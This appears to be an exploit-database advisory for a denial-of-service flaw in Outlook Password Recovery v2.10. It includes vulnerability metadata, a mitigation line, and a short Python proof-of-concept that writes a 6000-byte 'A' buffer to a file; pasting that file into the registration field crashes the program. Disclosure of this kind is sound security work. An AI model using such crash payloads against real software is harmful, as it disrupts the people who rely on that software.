Outlook Password Recovery v2.10 Denial of Service Exploit

vendor:

Outlook Password Recovery

by:

Velayutham Selvaraj & Praveen Thiyagarayam (TwinTech Solutions)

7.5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Outlook Password Recovery

Affected Version From: v2.10

Affected Version To: v2.10

Patch Exists: Yes

Related CWE: N/A

CPE: a:top-password:outlook_password_recovery

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7 x64, Windows XP SP3

2019

Outlook Password Recovery v2.10 Denial of Service Exploit

Outlook Password Recovery v2.10 is vulnerable to a Denial of Service attack. An attacker can create a malicious file containing 6000 bytes of data and paste it into the 'User Name and Registration Code' field, which will cause the application to crash.

Mitigation:

Ensure that the application is updated to the latest version and that all input is properly validated.

Source

Exploit-DB raw data:

#Exploit Title: Outlook Password Recovery v2.10 Denial of Service Exploit
# Date: 16.08.2019
# Vendor Homepage:https://www.top-password.com/
# Software Link: https://www.top-password.com/outlook-password-recovery.html
# Exploit Author: Velayutham Selvaraj & Praveen Thiyagarayam (TwinTech Solutions)
# Tested Version: v2.10
# Tested on: Windows 7 x64
# Windows XP SP3


# 1.- Run python code :Outlook Password Recovery.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open OUTLOOK Password Recovery and Click 'EnterKey'
# 4.- Paste the content of EVIL.txt into the Field: 'User Name and
Registration Code'
# 5.- Click 'OK' and you will see a crash.

#!/usr/bin/env python
buffer = "\x41" * 6000

try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"